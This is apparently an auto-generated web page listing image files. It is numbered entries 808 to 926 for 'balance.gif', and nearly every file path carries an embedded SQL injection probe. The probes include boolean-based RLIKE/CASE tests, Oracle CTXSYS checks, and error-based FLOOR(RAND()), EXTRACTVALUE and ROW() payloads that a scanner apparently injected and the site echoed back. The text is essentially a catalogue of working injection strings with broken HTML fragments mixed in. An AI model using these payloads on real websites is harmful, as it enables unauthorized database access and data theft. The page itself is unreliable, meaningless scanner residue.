808. | 1 | balance.gif //slike//stran_1 RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END))-- aEva/balance.gif |
809. | 1 | balance.gif //slike//stran_1') RLIKE (SELECT (CASE WHEN (4278=2354) THEN 1 ELSE 0x28 END)) AND ('yIYw'='yIYw/balance.gif |
810. | 1 | balance.gif //slike//stran_1') RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND ('xAGQ'='xAGQ/balance.gif |
811. | 1 | balance.gif //slike//stran_1')) RLIKE (SELECT (CASE WHEN (9739=7092) THEN 1 ELSE 0x28 END)) AND (('NKOm'='NKOm/balance.gif |
812. | 1 | balance.gif //slike//stran_1')) RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND (('frMU'='frMU/balance.gif |
813. | 1 | balance.gif //slike//stran_1' RLIKE (SELECT (CASE WHEN (3015=3295) THEN 1 ELSE 0x28 END)) AND 'fsTN'='fsTN/balance.gif |
814. | 1 | balance.gif //slike//stran_1' RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND 'OSjC'='OSjC/balance.gif |
815. | 1 | balance.gif //slike//stran_1') RLIKE (SELECT (CASE WHEN (6670=2369) THEN 1 ELSE 0x28 END)) AND ('pGVQ' LIKE 'pGVQ/balance.gif |
816. | 1 | balance.gif //slike//stran_1') RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND ('nyWY' LIKE 'nyWY/balance.gif |
817. | 1 | balance.gif //slike//stran_1%' RLIKE (SELECT (CASE WHEN (7802=4064) THEN 1 ELSE 0x28 END)) AND 'pwVa%'='pwVa/balance.gif |
818. | 1 | balance.gif //slike//stran_1%' RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND 'iwtf%'='iwtf/balance.gif |
819. | 1 | balance.gif //slike//stran_1' RLIKE (SELECT (CASE WHEN (3474=1741) THEN 1 ELSE 0x28 END)) AND 'VnUL' LIKE 'VnUL/balance.gif |
820. | 1 | balance.gif //slike//stran_1' RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND 'fTZE' LIKE 'fTZE/balance.gif |
821. | 1 | balance.gif //slike//stran_1") RLIKE (SELECT (CASE WHEN (8836=2198) THEN 1 ELSE 0x28 END)) AND ("jJyX"="jJyX/balance.gif |
822. | 1 | balance.gif //slike//stran_1") RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND ("FJGH"="FJGH/balance.gif |
823. | 1 | balance.gif //slike//stran_1" RLIKE (SELECT (CASE WHEN (4401=6794) THEN 1 ELSE 0x28 END)) AND "JrDm"="JrDm/balance.gif |
824. | 1 | balance.gif //slike//stran_1" RLIKE (SELECT (CASE WHEN (7589=7589) THEN 1 ELSE 0x28 END)) AND "NExi"="NExi/balance.gif |
825. | 1 | balance.gif //slike//stran_1) AND (SELECT (CASE WHEN (5062=8801) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,5062) END) FROM DUAL) IS NULL AND (1178=1178/balance.gif |
826. | 1 | balance.gif //slike//stran_1) AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND (7772=7772/balance.gif |
827. | 1 | balance.gif //slike//stran_1)) AND (SELECT (CASE WHEN (2841=8342) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,2841) END) FROM DUAL) IS NULL AND ((6477=6477/balance.gif |
828. | 1 | balance.gif //slike//stran_1)) AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND ((7816=7816/balance.gif |
829. | 1 | balance.gif //slike//stran_1 AND (SELECT (CASE WHEN (2227=7338) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,2227) END) FROM DUAL) IS NULL/balance.gif |
830. | 1 | balance.gif //slike//stran_1 AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL/balance.gif |
831. | 1 | balance.gif //slike//stran_1 AND (SELECT (CASE WHEN (8858=2970) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,8858) END) FROM DUAL) IS NULL-- nmxM/balance.gif |
832. | 1 | balance.gif //slike//stran_1 AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL-- eFGq/balance.gif |
833. | 1 | balance.gif //slike//stran_1') AND (SELECT (CASE WHEN (3439=7719) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3439) END) FROM DUAL) IS NULL AND ('wlQl'='wlQl/balance.gif |
834. | 1 | balance.gif //slike//stran_1') AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND ('JnrG'='JnrG/balance.gif |
835. | 1 | balance.gif //slike//stran_1')) AND (SELECT (CASE WHEN (9546=9021) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,9546) END) FROM DUAL) IS NULL AND (('gzPU'='gzPU/balance.gif |
836. | 1 | balance.gif //slike//stran_1')) AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND (('lpso'='lpso/balance.gif |
837. | 1 | balance.gif //slike//stran_1' AND (SELECT (CASE WHEN (5773=3938) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,5773) END) FROM DUAL) IS NULL AND 'QxdD'='QxdD/balance.gif |
838. | 1 | balance.gif //slike//stran_1' AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND 'ejON'='ejON/balance.gif |
839. | 1 | balance.gif //slike//stran_1') AND (SELECT (CASE WHEN (3216=3895) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3216) END) FROM DUAL) IS NULL AND ('Fgvr' LIKE 'Fgvr/balance.gif |
840. | 1 | balance.gif //slike//stran_1') AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND ('yjIp' LIKE 'yjIp/balance.gif |
841. | 1 | balance.gif //slike//stran_1%' AND (SELECT (CASE WHEN (2540=9005) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,2540) END) FROM DUAL) IS NULL AND 'nNkg%'='nNkg/balance.gif |
842. | 1 | balance.gif //slike//stran_1%' AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND 'wwuK%'='wwuK/balance.gif |
843. | 1 | balance.gif //slike//stran_1' AND (SELECT (CASE WHEN (8410=7041) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,8410) END) FROM DUAL) IS NULL AND 'oXyD' LIKE 'oXyD/balance.gif |
844. | 1 | balance.gif //slike//stran_1' AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND 'sahE' LIKE 'sahE/balance.gif |
845. | 1 | balance.gif //slike//stran_1") AND (SELECT (CASE WHEN (6417=7605) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,6417) END) FROM DUAL) IS NULL AND ("IkAH"="IkAH/balance.gif |
846. | 1 | balance.gif //slike//stran_1") AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND ("gOPd"="gOPd/balance.gif |
847. | 1 | balance.gif //slike//stran_1" AND (SELECT (CASE WHEN (5460=4132) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,5460) END) FROM DUAL) IS NULL AND "Prcj"="Prcj/balance.gif |
848. | 1 | balance.gif //slike//stran_1" AND (SELECT (CASE WHEN (3817=3817) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,3817) END) FROM DUAL) IS NULL AND "bOJH"="bOJH/balance.gif |
849. | 1 | balance.gif //slike//stran_(SELECT (CASE WHEN (2390=4676) THEN 1 ELSE (SELECT 4676 UNION SELECT 4954) END))/balance.gif |
850. | 1 | balance.gif //slike//stran_(SELECT (CASE WHEN (1699=1699) THEN 1 ELSE (SELECT 3385 UNION SELECT 9673) END))/balance.gif |
851. | 1 | balance.gif //slike//stran_(CASE WHEN (8746=9703) THEN 8746 ELSE 8746*(SELECT 8746 FROM DUAL UNION SELECT 9703 FROM DUAL) END)/balance.gif |
852. | 1 | balance.gif //slike//stran_(CASE WHEN (3036=3036) THEN 3036 ELSE 3036*(SELECT 3036 FROM DUAL UNION SELECT 7566 FROM DUAL) END)/balance.gif |
853. | 1 | balance.gif //slike//stran_(CASE WHEN 4316=5916 THEN 4316 ELSE NULL END)/balance.gif |
854. | 1 | balance.gif //slike//stran_(CASE WHEN 6885=6885 THEN 6885 ELSE NULL END)/balance.gif |
855. | 1 | balance.gif //slike//stran_1,(SELECT (CASE WHEN (8096=3948) THEN 1 ELSE 8096*(SELECT 8096 FROM INFORMATION_SCHEMA.PLUGINS) END))/balance.gif |
856. | 1 | balance.gif //slike//stran_1,(SELECT (CASE WHEN (9347=9347) THEN 1 ELSE 9347*(SELECT 9347 FROM INFORMATION_SCHEMA.PLUGINS) END))/balance.gif |
857. | 1 | balance.gif //slike//stran_1,(SELECT (CASE WHEN (8530=2057) THEN 1 ELSE 1/(SELECT 0) END))/balance.gif |
858. | 1 | balance.gif //slike//stran_1,(SELECT (CASE WHEN (9101=9101) THEN 1 ELSE 1/(SELECT 0) END))/balance.gif |
859. | 1 | balance.gif //slike//stran_1) AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (2513=2513/balance.gif |
860. | 1 | balance.gif //slike//stran_1)) AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((6911=6911/balance.gif |
861. | 1 | balance.gif //slike//stran_1 AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)/balance.gif |
862. | 1 | balance.gif //slike//stran_1 AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LkHh/balance.gif |
863. | 1 | balance.gif //slike//stran_1') AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('ttLp'='ttLp/balance.gif |
864. | 1 | balance.gif //slike//stran_1')) AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('YuAT'='YuAT/balance.gif |
865. | 1 | balance.gif //slike//stran_1' AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vLJQ'='vLJQ/balance.gif |
866. | 1 | balance.gif //slike//stran_1') AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('jAVy' LIKE 'jAVy/balance.gif |
867. | 1 | balance.gif //slike//stran_1%' AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PulW%'='PulW/balance.gif |
868. | 1 | balance.gif //slike//stran_1' AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'RLaS' LIKE 'RLaS/balance.gif |
869. | 1 | balance.gif //slike//stran_1") AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("cGUW"="cGUW/balance.gif |
870. | 1 | balance.gif //slike//stran_1" AND (SELECT 9638 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9638=9638,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "mNlK"="mNlK/balance.gif |
871. | 1 | balance.gif //slike//stran_1) OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (8010=8010/balance.gif |
872. | 1 | balance.gif //slike//stran_1)) OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((2355=2355/balance.gif |
873. | 1 | balance.gif //slike//stran_1 OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)/balance.gif |
874. | 1 | balance.gif //slike//stran_1 OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wqdR/balance.gif |
875. | 1 | balance.gif //slike//stran_1') OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('oTsH'='oTsH/balance.gif |
876. | 1 | balance.gif //slike//stran_1')) OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('dgoF'='dgoF/balance.gif |
877. | 1 | balance.gif //slike//stran_1' OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Lmdl'='Lmdl/balance.gif |
878. | 1 | balance.gif //slike//stran_1') OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('HQsa' LIKE 'HQsa/balance.gif |
879. | 1 | balance.gif //slike//stran_1%' OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QwZE%'='QwZE/balance.gif |
880. | 1 | balance.gif //slike//stran_1' OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NfeM' LIKE 'NfeM/balance.gif |
881. | 1 | balance.gif //slike//stran_1") OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("RDLe"="RDLe/balance.gif |
882. | 1 | balance.gif //slike//stran_1" OR (SELECT 9410 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(9410=9410,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "DJqx"="DJqx/balance.gif |
883. | 1 | balance.gif //slike//stran_1) AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND (4141=4141/balance.gif |
884. | 1 | balance.gif //slike//stran_1)) AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND ((1430=1430/balance.gif |
885. | 1 | balance.gif //slike//stran_1 AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871))/balance.gif |
886. | 1 | balance.gif //slike//stran_1 AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871))-- viHF/balance.gif |
887. | 1 | balance.gif //slike//stran_1') AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND ('AdIN'='AdIN/balance.gif |
888. | 1 | balance.gif //slike//stran_1')) AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND (('Otub'='Otub/balance.gif |
889. | 1 | balance.gif //slike//stran_1' AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND 'VpVk'='VpVk/balance.gif |
890. | 1 | balance.gif //slike//stran_1') AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND ('CuhC' LIKE 'CuhC/balance.gif |
891. | 1 | balance.gif //slike//stran_1%' AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND 'nfEA%'='nfEA/balance.gif |
892. | 1 | balance.gif //slike//stran_1' AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND 'cyrU' LIKE 'cyrU/balance.gif |
893. | 1 | balance.gif //slike//stran_1") AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND ("okZR"="okZR/balance.gif |
894. | 1 | balance.gif //slike//stran_1" AND EXTRACTVALUE(3296,CONCAT(0x5c,0x7171707671,(SELECT (ELT(3296=3296,1))),0x7170767871)) AND "IrZf"="IrZf/balance.gif |
895. | 1 | balance.gif //slike//stran_1) OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND (9056=9056/balance.gif |
896. | 1 | balance.gif //slike//stran_1)) OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND ((1319=1319/balance.gif |
897. | 1 | balance.gif //slike//stran_1 OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871))/balance.gif |
898. | 1 | balance.gif //slike//stran_1 OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871))-- iDnV/balance.gif |
899. | 1 | balance.gif //slike//stran_1') OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND ('juut'='juut/balance.gif |
900. | 1 | balance.gif //slike//stran_1')) OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND (('uPUt'='uPUt/balance.gif |
901. | 1 | balance.gif //slike//stran_1' OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND 'xcok'='xcok/balance.gif |
902. | 1 | balance.gif //slike//stran_1') OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND ('nKAH' LIKE 'nKAH/balance.gif |
903. | 1 | balance.gif //slike//stran_1%' OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND 'lbpv%'='lbpv/balance.gif |
904. | 1 | balance.gif //slike//stran_1' OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND 'Jsnd' LIKE 'Jsnd/balance.gif |
905. | 1 | balance.gif //slike//stran_1") OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND ("hMpe"="hMpe/balance.gif |
906. | 1 | balance.gif //slike//stran_1" OR EXTRACTVALUE(1910,CONCAT(0x5c,0x7171707671,(SELECT (ELT(1910=1910,1))),0x7170767871)) AND "brZJ"="brZJ/balance.gif |
907. | 1 | balance.gif //slike//stran_1) AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND (9397=9397/balance.gif |
908. | 1 | balance.gif //slike//stran_1)) AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND ((9165=9165/balance.gif |
909. | 1 | balance.gif //slike//stran_1 AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x)/balance.gif |
910. | 1 | balance.gif //slike//stran_1 AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x)-- ITAM/balance.gif |
911. | 1 | balance.gif //slike//stran_1') AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND ('rpIN'='rpIN/balance.gif |
912. | 1 | balance.gif //slike//stran_1')) AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND (('TQPm'='TQPm/balance.gif |
913. | 1 | balance.gif //slike//stran_1' AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND 'lCaZ'='lCaZ/balance.gif |
914. | 1 | balance.gif //slike//stran_1') AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND ('EENE' LIKE 'EENE/balance.gif |
915. | 1 | balance.gif //slike//stran_1%' AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND 'KKcU%'='KKcU/balance.gif |
916. | 1 | balance.gif //slike//stran_1' AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND 'nCDU' LIKE 'nCDU/balance.gif |
917. | 1 | (SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND ("vSAG"="vSAG&file=balance.gif','','scrollbars=1,resizable=1');">balance.gif //slike//stran_1") AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND ("vSAG"="vSAG/balance.gif |
918. | 1 | (SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND "LcJj"="LcJj&file=balance.gif','','scrollbars=1,resizable=1');">balance.gif //slike//stran_1" AND ROW(8478,2294)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8478=8478,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 1628 UNION SELECT 8818 UNION SELECT 3758 UNION SELECT 2409)a GROUP BY x) AND "LcJj"="LcJj/balance.gif |
919. | 1 | balance.gif //slike//stran_1) OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND (6641=6641/balance.gif |
920. | 1 | balance.gif //slike//stran_1)) OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND ((5901=5901/balance.gif |
921. | 1 | balance.gif //slike//stran_1 OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x)/balance.gif |
922. | 1 | balance.gif //slike//stran_1 OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x)-- kBvG/balance.gif |
923. | 1 | balance.gif //slike//stran_1') OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND ('UNOy'='UNOy/balance.gif |
924. | 1 | balance.gif //slike//stran_1')) OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND (('lDpG'='lDpG/balance.gif |
925. | 1 | balance.gif //slike//stran_1' OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND 'EDsz'='EDsz/balance.gif |
926. | 1 | balance.gif //slike//stran_1') OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND ('tKOa' LIKE 'tKOa/balance.gif |
